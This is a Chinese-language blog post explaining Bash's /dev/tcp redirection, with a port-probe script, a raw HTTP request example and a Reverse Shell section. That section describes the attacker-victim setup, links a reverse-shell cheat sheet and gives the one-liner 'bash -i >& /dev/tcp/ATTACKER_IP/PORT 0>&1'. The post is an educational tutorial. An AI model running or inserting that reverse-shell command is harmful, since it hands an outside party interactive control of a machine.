<!DOCTYPE html><html lang="en"> <head><meta charset="utf-8"><link rel="alternate" type="application/rss+xml" title="Paul's Blog | Powered by Astro" href="https://paulwang.vercel.app/rss.xml"><link rel="icon" type="image/svg+xml" href="/favicon.svg"><meta name="viewport" content="width=device-width"><meta name="generator" content="Astro v5.14.1"><title>Paul's Blog</title><!-- 允许子布局注入额外的 head 内容 --><link rel="preload" href="https://cdn.jsdelivr.net/npm/katex@0.16.4/dist/katex.min.css" as="style"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.16.4/dist/katex.min.css"><link rel="preload" href="https://cdn.jsdelivr.net/npm/katex@0.16.4/dist/katex.min.js" as="script"><link rel="stylesheet" href="/_astro/_slug_.BsYvngTm.css">
<link rel="stylesheet" href="/_astro/_slug_.DtFYsS4A.css"><script type="module" src="/_astro/page.DTIbhfSr.js"></script></head>  <div class="page-wrapper"> <!-- <Navigation /> --> <header class="site-header"> <!-- KaTeX 资源优化：仅在文章页面加载 --> <!-- 移至 MarkdownPostLayout.astro 以按需加载 --> <div class="container"> <div class="site-branding"> <a href="/" class="site-logo"> <span>Paul's Blog</span> </a> </div> <button id="mobile-nav-toggle" class="mobile-nav-toggle" aria-label="Toggle menu" aria-expanded="false">
☰
</button> <nav class="main-nav"> <a href="/">Home</a> <a href="/blog">Blog</a> <a href="/tags">Tags</a> <a href="/thoughts">Thoughts</a> <a href="/about">About</a> <span class="theme-toggle"><button class="theme-toggle-btn" type="button" aria-label="切换暗色/浅色模式" data-astro-cid-oemx5le4> <div class="taichi" data-astro-cid-oemx5le4></div> </button>  <script type="module">function a(){const t=()=>{const e=document.documentElement;e.classList.toggle("dark");const o=e.classList.contains("dark");localStorage.setItem("theme",o?"dark":"light"),document.querySelectorAll(".theme-toggle-btn").forEach(l=>{l.setAttribute("aria-pressed",o?"true":"false")})};document.querySelectorAll(".theme-toggle-btn").forEach(e=>{e.removeEventListener("click",t),e.addEventListener("click",t),e.setAttribute("aria-pressed",document.documentElement.classList.contains("dark")?"true":"false")})}a();document.addEventListener("astro:page-load",a);const n=typeof localStorage<"u"&&localStorage.getItem("theme")?localStorage.getItem("theme"):window.matchMedia("(prefers-color-scheme: dark)").matches?"dark":"light";n==="light"?document.documentElement.classList.remove("dark"):document.documentElement.classList.add("dark");window.localStorage.setItem("theme",n);</script></span> </nav> </div> </header> <!-- <h1>Astro</h1> -->      <div class="post-layout-grid" data-astro-cid-5grsw2hi> <header class="post-header" data-astro-cid-5grsw2hi> <h1 data-astro-cid-5grsw2hi>Bash shell magic: /dev/tcp/...</h1> <div class="post-meta" data-astro-cid-5grsw2hi> <span data-astro-cid-5grsw2hi>Author: Paul</span> <time datetime="2025-06-24T00:00:00.000Z" data-astro-cid-5grsw2hi>Publish: June 24, 2025</time> </div> </header>  <aside class="post-toc" data-astro-cid-5grsw2hi> <div class="toc-wrapper" data-astro-cid-5grsw2hi>   <details open data-astro-cid-5grsw2hi> <summary data-astro-cid-5grsw2hi> <h3 data-astro-cid-5grsw2hi>目录</h3> </summary> <ul data-astro-cid-5grsw2hi> <li class="depth-2" data-astro-cid-5grsw2hi> <a href="#端口扫描探测" data-astro-cid-5grsw2hi> 端口扫描/探测 </a> </li><li class="depth-2" data-astro-cid-5grsw2hi> <a href="#http-请求" data-astro-cid-5grsw2hi> HTTP 请求 </a> </li><li class="depth-2" data-astro-cid-5grsw2hi> <a href="#reverse-shell" data-astro-cid-5grsw2hi> Reverse Shell </a> </li> </ul> </details> </div> </aside> <article class="post-content prose prose-slate dark:prose-invert mx-auto p-4" data-astro-cid-5grsw2hi>  <blockquote>
<p>Bash 将  <code>/dev/tcp/主机/端口</code>  解释为特殊重定向，打开时自动建立 TCP socket 连接，读写操作相当于在该连接上传输数据。<a href="https://stackoverflow.com/questions/76899269/can-someone-explain-how-does-this-command-works-bash-i-dev-tcp-ip-port"></a>​</p>
<p>此功能从 Bash 2.04 版本开始支持，仅在 Bash 中有效，其他 shell 如 Zsh 不支持。​</p>
</blockquote>
<p>在 Linux/Unix 的世界里，“一切皆文件” (Everything is a file)。这个哲学思想意味着你可以用相同的命令和操作（如 <code>cat</code>, <code>echo</code>, <code>read</code>, 重定向 <code>&#x3C;</code> 和 <code>></code>) 来处理不同类型的 I/O，无论是真正的文件、硬件设备还是进程。</p>
<p><code>/dev/tcp/...</code> 这个特性正是这种思想的延伸。这样，就可以用最基础的 Shell 命令来实现网络通信，而<strong>无需调用外部程序</strong>，如 <code>netcat (nc)</code>、<code>telnet</code> 或 <code>curl</code>。这个功能的核心是<strong>重定向 (Redirection)</strong>。</p>
<h2 id="端口扫描探测">端口扫描/探测</h2>
<figure data-rehype-pretty-code-figure=""><pre tabindex="0" data-language="bash" data-theme="vitesse-light"><code data-language="bash" data-theme="vitesse-light" style="display: grid;"><span data-line=""><span style="color:#A0ADA0"># 尝试连接到 www.google.com 的 80 端口</span></span>
<span data-line=""><span style="color:#999999">(</span><span style="color:#998418">echo</span><span style="color:#AB5959"> ></span><span style="color:#B56959"> /dev/tcp/www.google.com/80</span><span style="color:#999999">)</span><span style="color:#999999"> &#x26;</span><span style="color:#AB5959">></span><span style="color:#393A34">/dev/null</span></span></code></pre></figure>
<p>dev_tcp_scan.sh</p>
<figure data-rehype-pretty-code-figure=""><pre tabindex="0" data-language="bash" data-theme="vitesse-light"><code data-language="bash" data-theme="vitesse-light" style="display: grid;"><span data-line=""><span style="color:#A0ADA0">#!/bin/bash</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#B07D48">HOST</span><span style="color:#999999">=</span><span style="color:#B5695977">"</span><span style="color:#B56959">www.baidu.com</span><span style="color:#B5695977">"</span></span>
<span data-line=""><span style="color:#B07D48">PORT</span><span style="color:#999999">=</span><span style="color:#B5695977">"</span><span style="color:#B56959">80</span><span style="color:#B5695977">"</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#998418">echo</span><span style="color:#B5695977"> "</span><span style="color:#B56959">正在检查主机 $HOST 的端口 $PORT...</span><span style="color:#B5695977">"</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#A0ADA0"># 超时设置（可选，但推荐）</span></span>
<span data-line=""><span style="color:#59873A">timeout</span><span style="color:#2F798A"> 1</span><span style="color:#B56959"> bash</span><span style="color:#A65E2B"> -c</span><span style="color:#B5695977"> "</span><span style="color:#B56959">(echo > /dev/tcp/$HOST/$PORT) &#x26;>/dev/null</span><span style="color:#B5695977">"</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#1E754F">if</span><span style="color:#999999"> [</span><span style="color:#A65E2B"> $?</span><span style="color:#AB5959"> -eq</span><span style="color:#2F798A"> 0</span><span style="color:#999999"> ];</span><span style="color:#1E754F"> then</span></span>
<span data-line=""><span style="color:#998418">    echo</span><span style="color:#B5695977"> "</span><span style="color:#B56959">成功：端口 $PORT 是开放的。</span><span style="color:#B5695977">"</span></span>
<span data-line=""><span style="color:#1E754F">else</span></span>
<span data-line=""><span style="color:#998418">    echo</span><span style="color:#B5695977"> "</span><span style="color:#B56959">失败：端口 $PORT 是关闭的或主机不可达。</span><span style="color:#B5695977">"</span></span>
<span data-line=""><span style="color:#1E754F">fi</span></span></code></pre></figure>
<p><img  loading="lazy" decoding="async" fetchpriority="auto" width="647" height="109" src="/_astro/-20260104.C-QqgJyX_Z1RvPkq.webp" ></p>
<h2 id="http-请求">HTTP 请求</h2>
<figure data-rehype-pretty-code-figure=""><pre tabindex="0" data-language="bash" data-theme="vitesse-light"><code data-language="bash" data-theme="vitesse-light" style="display: grid;"><span data-line=""><span style="color:#A0ADA0">#!/bin/bash</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#A0ADA0"># 使用 exec 将文件描述符3与一个到 a.cn 的80端口的TCP连接关联</span></span>
<span data-line=""><span style="color:#A0ADA0"># &#x3C;> 表示可读可写</span></span>
<span data-line=""><span style="color:#998418">exec</span><span style="color:#2F798A"> 3</span><span style="color:#AB5959">&#x3C;></span><span style="color:#B56959">/dev/tcp/cn.bing.com/80</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#A0ADA0"># 通过文件描述符3发送一个 HTTP GET 请求</span></span>
<span data-line=""><span style="color:#A0ADA0"># -e 让 echo 能够解析 \n 换行符</span></span>
<span data-line=""><span style="color:#998418">echo</span><span style="color:#A65E2B"> -e</span><span style="color:#B5695977"> "</span><span style="color:#B56959">GET / HTTP/1.1\nHost: cn.bing.com\n\n</span><span style="color:#B5695977">"</span><span style="color:#AB5959"> >&#x26;3</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#A0ADA0"># 从文件描述符3读取并打印服务器的响应</span></span>
<span data-line=""><span style="color:#59873A">cat</span><span style="color:#AB5959"> &#x3C;</span><span style="color:#999999">&#x26;</span><span style="color:#59873A">3</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#A0ADA0"># 关闭文件描述符</span></span>
<span data-line=""><span style="color:#998418">exec</span><span style="color:#2F798A"> 3</span><span style="color:#AB5959">&#x3C;</span><span style="color:#999999">&#x26;</span><span style="color:#59873A">-</span></span></code></pre></figure>
<h2 id="reverse-shell">Reverse Shell</h2>
<ul>
<li><a href="https://www.ddosi.org/reverse-shell/#Bash%E5%8F%8D%E5%90%91Shell">反向 shell 备忘单|Reverse Shell Cheat Sheet - 🔰 雨苁 ℒ🔰</a></li>
</ul>
<p>为了绕过防火墙的限制，反向 Shell 应运而生。它把连接的方向完全颠倒了过来。</p>
<ol>
<li><strong>攻击者机器 (服务器端)</strong>：在自己的公网服务器上运行一个程序，监听在某个端口上（比如 <code>4444</code>），等待“猎物”上钩。</li>
<li><strong>受害者机器 (客户端)</strong>：主动执行一个命令，<strong>从内部发起连接</strong>，去连接攻击者机器的 <code>IP:4444</code>。</li>
<li>一旦连接成功，受害者机器就把本地的 Shell（<code>/bin/bash</code>）的输入输出，全部交给了这个主动建立的连接。</li>
</ol>
<figure data-rehype-pretty-code-figure=""><pre tabindex="0" data-language="bash" data-theme="vitesse-light"><code data-language="bash" data-theme="vitesse-light" style="display: grid;"><span data-line=""><span style="color:#A0ADA0"># -i 交互式</span></span>
<span data-line=""><span style="color:#A0ADA0"># >&#x26; 重定向，stdout stderr定向到/dev/tcp/ATTACKER_IP/PORT</span></span>
<span data-line=""><span style="color:#A0ADA0"># 0>&#x26;1 stdin定向到/dev/tcp/ATTACKER_IP/PORT中</span></span>
<span data-line=""><span style="color:#59873A">bash</span><span style="color:#A65E2B"> -i</span><span style="color:#AB5959"> >&#x26;</span><span style="color:#B56959"> /dev/tcp/ATTACKER_IP/PORT</span><span style="color:#AB5959"> 0>&#x26;1</span></span></code></pre></figure>  </article> </div>  <footer class="site-footer"> <div class="container"> <p>
&copy; 2024 - <span id="current-year"></span> | Inspired by
<strong><a href="https://astro.build/" class="about-link">Astro</a></strong> & <strong><a href="https://claude.com/claude-code" class="about-link">Claude Code</a></strong> & <strong><a href="https://github.com/HEIGE-PCloud/DoIt" class="about-link">Dolt</a></strong> </p> </div> </footer> <button id="back-to-top" aria-label="回到顶部" class="back-to-top" data-astro-cid-wlspcwf4> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" data-astro-cid-wlspcwf4> <path d="M18 15l-6-6-6 6" data-astro-cid-wlspcwf4></path> </svg> </button>  <script type="module">function i(){const o=document.getElementById("back-to-top");if(!o)return;o.addEventListener("click",()=>{window.scrollTo({top:0,behavior:"smooth"})});const t=()=>{window.scrollY>300?o.classList.add("is-visible"):o.classList.remove("is-visible")};window.addEventListener("scroll",t),t()}i();document.addEventListener("astro:page-load",i);</script> <script type="module">document.addEventListener("DOMContentLoaded",()=>{const e=document.getElementById("mobile-nav-toggle"),n=document.querySelector(".main-nav");e&&n&&e.addEventListener("click",()=>{n.classList.toggle("is-open");const i=n.classList.contains("is-open");e.setAttribute("aria-expanded",String(i))})});var c="@vercel/analytics",s="1.5.0",u=()=>{window.va||(window.va=function(...n){(window.vaq=window.vaq||[]).push(n)})};function r(){return typeof window<"u"}function o(){try{const e="production"}catch{}return"production"}function l(e="auto"){if(e==="auto"){window.vam=o();return}window.vam=e}function f(){return(r()?window.vam:o())||"production"}function a(){return f()==="development"}function v(e){return e.scriptSrc?e.scriptSrc:a()?"https://va.vercel-scripts.com/v1/script.debug.js":e.basePath?`${e.basePath}/insights/script.js`:"/_vercel/insights/script.js"}function m(e={debug:!0}){var n;if(!r())return;l(e.mode),u(),e.beforeSend&&((n=window.va)==null||n.call(window,"beforeSend",e.beforeSend));const i=v(e);if(document.head.querySelector(`script[src*="${i}"]`))return;const t=document.createElement("script");t.src=i,t.defer=!0,t.dataset.sdkn=c+(e.framework?`/${e.framework}`:""),t.dataset.sdkv=s,e.disableAutoTrack&&(t.dataset.disableAutoTrack="1"),e.endpoint?t.dataset.endpoint=e.endpoint:e.basePath&&(t.dataset.endpoint=`${e.basePath}/insights`),e.dsn&&(t.dataset.dsn=e.dsn),t.onerror=()=>{const d=a()?"Please check if any ad blockers are enabled and try again.":"Be sure to enable Web Analytics for your project and deploy again. See https://vercel.com/docs/analytics/quickstart for more information.";console.log(`[Vercel Web Analytics] Failed to load script from ${i}. ${d}`)},a()&&e.debug===!1&&(t.dataset.debug="false"),document.head.appendChild(t)}document.addEventListener("DOMContentLoaded",function(){const e=document.getElementById("current-year");e&&(e.textContent=String(new Date().getFullYear()))});m();</script> </div> </html> 